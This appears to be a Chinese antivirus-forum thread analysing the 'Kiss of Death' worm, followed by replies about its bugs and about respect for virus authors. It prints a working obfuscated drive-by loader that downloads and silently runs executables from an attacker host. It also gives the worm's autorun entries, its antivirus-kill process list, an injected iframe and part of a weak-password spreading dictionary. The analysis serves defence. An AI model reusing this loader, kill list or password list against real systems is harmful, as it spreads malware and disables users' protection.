样本来源
http://forum.ikaka.com/topic.asp?board=28&artid=8279815

以前写过这个病毒的一个版本
http://forum.ikaka.com/topic.asp?board=28&artid=8261614

从网页一直分析到病毒为止,开工!

猫叔 提到的那个帖子的网址 已经解密
<script src=http://www.17tc.com/pop.js></script>

跳转
http://www.17tc.com/pop.htm

代码入下
<script>var url,kiss;url="http://a.2007ip.com/*****.exe";kiss="C:\\windows\\gggg.exe";try{var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var xml=ado.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var as=ado.createobject("Adodb.Stream","");xml.Open("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);as.savetofile(kiss,2);var shell=ado.createobject("Shell.Application","");shell.Shell(pa222th,"","","open",0);}catch(e){};</script>
  <script language="VBScript">
    on error resume next
    j1="clsid:":j2="BD96C556-":j3="65A3-":j4="11D0-":j5="983A-":j6="00C04FC29E36"
    j7=j1&j2&j3&j4&j5&j6
    Set df = document.createElement("object")
    df.setAttribute "classid", j7
    b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
    strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
    Set x = df.CreateObject(strb,"")

dl = "http://a.2007ip.com/yt.vbs"
:fname1="yt.vbs"
    z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"
    zz=z1&z2&z3&z4&z5&z6
    sub shellexe(zz,fname1)
    set Q = df.createobject(zz,""):Q.ShellExecute fname1,"","","open",0
     end sub
a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
    strd=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
    set SS = df.createobject(strd,"")
    SS.type = 1
    f4="G":f5="E":f6="T"
    stre=f4&f5&f6
   
    x.Open stre, dl, False
    x.Send
    SS.close
    set F = df.createobject("Scripting.FileSystemObject","")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    fname1= F.Buildkiss(tmp,fname1)
    SS.write x.responseBody
    SS.savetofile fname1,2
    call shellexe(zz,fname1)
    </script>

C:\\windows\\gggg.exe
这个就是 死神之吻 的主体..

就以前的死神 与 这个死神 相比..有所增强..但是bug 多如大米..

样本编写语言：Borland Delphi 6.0 - 7.0
加壳方式：DWing的Upack

释放文件
C:\WINDOWS\system32\Death.SiShen
C:\WINDOWS\system32\spoolsv.exe
C:\pass.dic
F:\1.ico

C:\WINDOWS\system32\Death.SiShen
内容为
[Autorun]
OPEN=Death.exe
shellexecute=Death.exe
shell\Auto\command=Death.exe

创建启动项
[software\microsoft\windows\currentversion\run]
什么都没写入..

修改 显示文件和文件夹 注册表
[HKLM\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000

所有根目录及移动存储生成
X:\autorun.inf
X:\death.exe
[autorun]
\n\nopen=death.exe
\n\nshellexecute=death.exe
\n\nshell\auto\command=death.exe

尝试关闭窗口
symantec antivirus 企业版
江民杀毒软件 kv2006：实时监视
ravmonclass
tflockdownmain
zonealarm
zaframewnd
天网防火墙个人版
tapplication
天网防火墙企业版
tapplication
virusscan
symantec antivirus
duba
wrapped gift killer
icesword
pjf(ustc)
防火墙
tform1
噬菌体
木马克星

尝试关闭进程
eghost.exe
mailmon.exe
kavpfw.exe
iparmor.exe
_avp32.exe
_avpcc.exe
_avpm.exe
avp32.exe
avpcc.exe
avpm.exe
avp.exe
navapw32.exe
navw32.exe
nod32kui.exe
nod32kru.exe
pfw.exe
kfw.exe
kavpfw.exe
vsmon.exe
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
ravmon.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
360safe.exe
360tray.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
fyfirewall.exe

修改系统进程内存
C:\WINDOWS\system32\winlogon.exe

搜索感染除系统盘以外的 .exe/.scr/.com/.pif/.htm/.html/.asp/.php/.jsp/.aspx 文件

(.exe/.scr/.com/.pif/)上个分析里的死神 是替换 文件..这个版本改为与"熊猫烧香"相同的方法 捆绑

感染的  .htm/.html/.asp/.php/.jsp/.aspx 文件 在尾部加入
<iframe src=http://if.iloveck.com/test/test.htm width=0 height=0></iframe>

访问网络下载其他病毒
http://a.2007ip.com/****/01.exe
~
http://a.2007ip.com/****/10.exe

保存到 c:\1.exe ~ c:\10.exe

利用弱口令访问区域内计算机传播(death.exe)

c:\pass.dic
内容为

%null%
%username%
!@#$
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
000000
00000000
0123456789
huaxia
1
101010
111
111111
1111111
11111111
1111111111
111222
112233
11223344
121212
12121212
123
123123
123321
1234
12344321
12345
123456
1234567
12345678
123456789
1234567890
1234qwer
123abc
123go
1313
131313
1314520
147258
168168
1p2o3i
1q2w3e
1qaz2wsx
2222
222222
2222222
22222222
31415926
333333
369
4444
520
5201314
520520
54321
5555
555555
55555555
5683
654321
666666
666888
7758521
7758258
777
7777
777777
7777777
77777777
789456
790119
80486
888888
88888888
888999
960628
987654
987654321
999999
99999999
999999999
@#$%^&
a
aaa
aaaaaa
abc
abc123
abcd
abcd1234
abcde
abcdef
abcdefg
access
action
active

一大堆 字数 原因不列了..

F:\1.ico 为感染后的 .exe/.scr/.com/.pif 图标..

HcCSBoy
别在写这无聊的玩意了..
估计是无法完全达到熊猫效果的..
搞个统计流量的没用的.. 多此一举..

现在不多余了

bug:
spoolsv.exe
替换无效

启动创建失败

X:\autorun.inf
X:\death.exe
创建失败

.htm/.html/.asp/.php/.jsp/.aspx
无法在其尾部添加

C:\WINDOWS\system32\winlogon.exe
直接修改内存.. 这个一般人都知道..直接修改的后过..


列出bug

同样希望别模仿 熊猫 了..

跟在后面看看

m,低调些,捆绑类病毒的技术起点低,但是清除麻烦.帮助网友的同时记得给病毒作者一些尊重,这种尊重是对对手的尊重.

m,低调些,捆绑类病毒的技术起点低,但是清除麻烦.帮助网友的同时记得给病毒作者一些尊重,这种尊重是对对手的尊重.

回复:阿里巴巴616
[此人心理境界颇高 有佛家思想 可惜那些病毒制作者们无法理解]

不要给我戴高帽,我不懂佛.主要是因为m是我的partner,卡卡论坛上已经有人声明对这个病毒负责并且不再更新(我们暂且相信),矛与盾是对手而不一定非要成敌人,既然别人已经说了不更新,并且第一个病毒因为BUG问题也很好处理,我们没必要再去挑逗作者或者变相的说别人技术水平低(事实上到底有多少人的WIN32开发功底比作者高,彼此心里都明白).如果作者的自尊心被伤,失言了,把BUG修一下就又是一场风暴,受损失的不是我和m,是网民.如果阁下觉得我的话不对,欢迎继续拍砖,但不要扯到什么佛法了,我不知道你是在说真话还是讽刺.

                                    农夫 留

引用:

【walker05的贴子】m,低调些,捆绑类病毒的技术起点低,但是清除麻烦.帮助网友的同时记得给病毒作者一些尊重,这种尊重是对对手的尊重. ………………

晕了,变天了么?

!

好玩,瞅瞅

引用:

【walker05的贴子】m,低调些,捆绑类病毒的技术起点低,但是清除麻烦.帮助网友的同时记得给病毒作者一些尊重,这种尊重是对对手的尊重. ………………

那我们中毒的同时,难道还要感谢病毒作者吗?

应该是HNCSBOY吧

太烂了 写一个鸟蠕虫 还这么多BUG......

虽然作者极力隐藏网上的行踪 但是.......